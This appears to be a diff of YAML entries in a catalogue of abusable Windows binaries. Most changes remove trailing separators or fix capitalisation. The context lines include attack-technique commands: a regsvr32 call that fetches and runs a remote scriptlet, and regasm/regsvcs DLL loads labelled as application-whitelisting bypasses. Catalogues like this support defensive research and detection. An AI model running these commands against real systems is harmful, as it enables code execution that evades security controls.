---

View File

@ -38,4 +38,3 @@ Acknowledgement:
Handle: '@kylehanslovan' Handle: '@kylehanslovan'
- Person: Fab - Person: Fab
Handle: '@0rbz_' Handle: '@0rbz_'
---

View File

@ -22,4 +22,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Pierre-Alexandre Braeken - Person: Pierre-Alexandre Braeken
Handle: '@pabraeken' Handle: '@pabraeken'
---

View File

@ -31,4 +31,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Derek Johnson - Person: Derek Johnson
Handle: '' Handle: ''
---

View File

@ -22,4 +22,3 @@ Acknowledgement:
Handle: '@LuxNoBulIshit' Handle: '@LuxNoBulIshit'
- Person: Avihay eldad - Person: Avihay eldad
Handle: '@aloneliassaf' Handle: '@aloneliassaf'
---

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---

View File

@ -40,4 +40,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

View File

@ -28,4 +28,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Elliot Killick - Person: Elliot Killick
Handle: '@elliotkillick' Handle: '@elliotkillick'
---

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Leon Rodenko - Person: Leon Rodenko
Handle: '@L3m0nada' Handle: '@L3m0nada'
---

View File

@ -24,4 +24,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: FireEye - Person: FireEye
Handle: '@FireEye' Handle: '@FireEye'
---

View File

@ -41,4 +41,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Grzegorz Tworek - Person: Grzegorz Tworek
Handle: '@0gtweet' Handle: '@0gtweet'
---

View File

@ -36,4 +36,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

View File

@ -7,7 +7,7 @@ Commands:
- Command: regasm.exe AllTheThingsx64.dll - Command: regasm.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute code and bypass Application whitelisting Usecase: Execute code and bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: Local Admin Privileges: Local Admin
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -38,4 +38,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---

View File

@ -32,4 +32,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Eli Salem - Person: Eli Salem
Handle: '@elisalem9' Handle: '@elisalem9'
---

View File

@ -24,4 +24,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Philip Tsukerman - Person: Philip Tsukerman
Handle: '@PhilipTsukerman' Handle: '@PhilipTsukerman'
---

View File

@ -14,7 +14,7 @@ Commands:
- Command: regsvcs.exe AllTheThingsx64.dll - Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function. Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting Usecase: Execute dll file and bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: Local Admin Privileges: Local Admin
MitreID: T1218.009 MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -34,4 +34,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---

View File

@ -7,14 +7,14 @@ Commands:
- Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
Description: Execute the specified remote .SCT script with scrobj.dll. Description: Execute the specified remote .SCT script with scrobj.dll.
Usecase: Execute code from remote scriptlet, bypass Application whitelisting Usecase: Execute code from remote scriptlet, bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218.010 MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: regsvr32.exe /s /u /i:file.sct scrobj.dll - Command: regsvr32.exe /s /u /i:file.sct scrobj.dll
Description: Execute the specified local .SCT script with scrobj.dll. Description: Execute the specified local .SCT script with scrobj.dll.
Usecase: Execute code from scriptlet, bypass Application whitelisting Usecase: Execute code from scriptlet, bypass Application whitelisting
Category: AWL bypass Category: AWL Bypass
Privileges: User Privileges: User
MitreID: T1218.010 MitreID: T1218.010
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
@ -57,4 +57,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Casey Smith - Person: Casey Smith
Handle: '@subtee' Handle: '@subtee'
---

View File

@ -32,4 +32,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: elceef - Person: elceef
Handle: '@elceef' Handle: '@elceef'
---

View File

@ -39,4 +39,3 @@ Acknowledgement:
Handle: '@splinter_code' Handle: '@splinter_code'
- Person: ap - Person: ap
Handle: '@decoder_it' Handle: '@decoder_it'
---

View File

@ -91,4 +91,3 @@ Acknowledgement:
Handle: '@404death' Handle: '@404death'
- Person: Martin Ingesen - Person: Martin Ingesen
Handle: '@Mrtn9' Handle: '@Mrtn9'
---

View File

@ -1,6 +1,6 @@
--- ---
Name: Runonce.exe Name: Runonce.exe
Description: Description: Executes a Run Once Task that has been configured in the registry
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -27,4 +27,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Pierre-Alexandre Braeken - Person: Pierre-Alexandre Braeken
Handle: '@pabraeken' Handle: '@pabraeken'
---

View File

@ -1,6 +1,6 @@
--- ---
Name: Runscripthelper.exe Name: Runscripthelper.exe
Description: Description: Execute target PowerShell script
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -26,4 +26,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Matt Graeber - Person: Matt Graeber
Handle: '@mattifestation' Handle: '@mattifestation'
---

View File

@ -36,4 +36,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Oddvar Moe - Person: Oddvar Moe
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
---

View File

@ -33,4 +33,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: - Person:
Handle: Handle:
---

View File

@ -1,6 +1,6 @@
--- ---
Name: Scriptrunner.exe Name: Scriptrunner.exe
Description: Description: Execute binary through proxy binary to evade defensive counter measures
Author: 'Oddvar Moe' Author: 'Oddvar Moe'
Created: 2018-05-25 Created: 2018-05-25
Commands: Commands:
@ -33,4 +33,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Nick Tyrer - Person: Nick Tyrer
Handle: '@nicktyrer' Handle: '@nicktyrer'
---

View File

@ -31,4 +31,3 @@ Acknowledgement:
Handle: '@hexacorn' Handle: '@hexacorn'
- Person: Elliot Killick - Person: Elliot Killick
Handle: '@elliotkillick' Handle: '@elliotkillick'
---

View File

@ -22,4 +22,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Eral4m - Person: Eral4m
Handle: '@eral4m' Handle: '@eral4m'
---

View File

@ -25,4 +25,3 @@ Resources:
Acknowledgement: Acknowledgement:
- Person: Nick Landers - Person: Nick Landers
Handle: '@monoxgas' Handle: '@monoxgas'
---

View File

@ -35,4 +35,3 @@ Acknowledgement:
Handle: '@oddvarmoe' Handle: '@oddvarmoe'
- Person: Maxime Nadeau - Person: Maxime Nadeau
Handle: '@m_nad0' Handle: '@m_nad0'
---

View File

@ -37,4 +37,3 @@ Acknowledgement:
Handle: '@oulusoyum' Handle: '@oulusoyum'
- Person: Matt Graeber - Person: Matt Graeber
Handle: '@mattifestation' Handle: '@mattifestation'
---

View File

@ -31,4 +31,3 @@ Acknowledgement:
Handle: Handle:
- Person: Hai Vaknin(Lux) - Person: Hai Vaknin(Lux)
Handle: Handle:
---

Some files were not shown because too many files have changed in this diff Show More